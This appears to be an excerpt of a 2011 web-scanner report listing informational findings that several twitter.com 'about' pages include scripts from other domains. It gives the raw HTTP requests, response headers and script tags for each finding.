<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.386. http://twitter.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /about HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234770-9663-3714
ETag: "759e29e67d3c94cea37b1e09aabdf212"
Last-Modified: Fri, 28 Jan 2011 17:12:50 GMT
X-Runtime: 0.01683
Content-Type: text/html; charset=utf-8
Content-Length: 15031
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.387. http://twitter.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /about HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225078-81361-59906
ETag: "ab332c29e3804246af65d489155e144e"
Last-Modified: Fri, 28 Jan 2011 14:31:18 GMT
X-Runtime: 0.18722
Content-Type: text/html; charset=utf-8
Content-Length: 15164
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZThlMDExYjJmNmQzODczNjgwYWY4M2RiNzlhYTY5%250ANGU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5f458640ebcf7c125bea2d557117ee384f19570f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.388. http://twitter.com/about/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about/contact

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /about/contact HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225078-5855-53327
ETag: "ee4327c585f1140407cbc5106769d4eb"
Last-Modified: Fri, 28 Jan 2011 14:31:18 GMT
X-Runtime: 0.02946
Content-Type: text/html; charset=utf-8
Content-Length: 10974
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzdiYmUxOThjZjIyNjY2YTgzMWVkNmZlNmEwM2Yw%250AMDI6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--da3a7d4f9fbdbbc32b992a2ee93c9facd042300f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.389. http://twitter.com/about/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about/contact

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /about/contact HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234771-74564-62948
ETag: "4c188c0444cbce9437df805d7c56867a"
Last-Modified: Fri, 28 Jan 2011 17:12:51 GMT
X-Runtime: 0.02350
Content-Type: text/html; charset=utf-8
Content-Length: 10844
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.390. http://twitter.com/about/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about/resources

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /about/resources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225079-3941-56167
ETag: "b3415b3a1e4db6b10e96993fd3ced6dd"
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
X-Runtime: 0.02948
Content-Type: text/html; charset=utf-8
Content-Length: 12672
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYTdlYjkyMDk3OTcwMTQxNTFlMjM2ZmE3YmE4ODJj%250ANmM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5ad46e0e7e340cae0b9f7ca2011b39284030c689; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.391. http://twitter.com/about/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about/resources

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /about/resources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234772-27950-53622
ETag: "3fe1eb47d48f7490841d19f6488f5a08"
Last-Modified: Fri, 28 Jan 2011 17:12:52 GMT
X-Runtime: 0.03441
Content-Type: text/html; charset=utf-8
Content-Length: 12542
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.392. http://twitter.com/about/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about/resources

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /about/resources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:33:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225205-63225-2420
ETag: "1a4f3c18519f75b7266df4f8dc394c9f"
Last-Modified: Fri, 28 Jan 2011 14:33:25 GMT
X-Runtime: 0.02207
Content-Type: text/html; charset=utf-8
Content-Length: 12672
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlNDUxYTUxZDBlYTcxMDVkMTQ2NjM5NzM3ZjE5ZjQ5%250AZDE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--c5066d7aa424a660c61f86a5ccedf91a37b4d85a; domain=.twitter.com; path=/
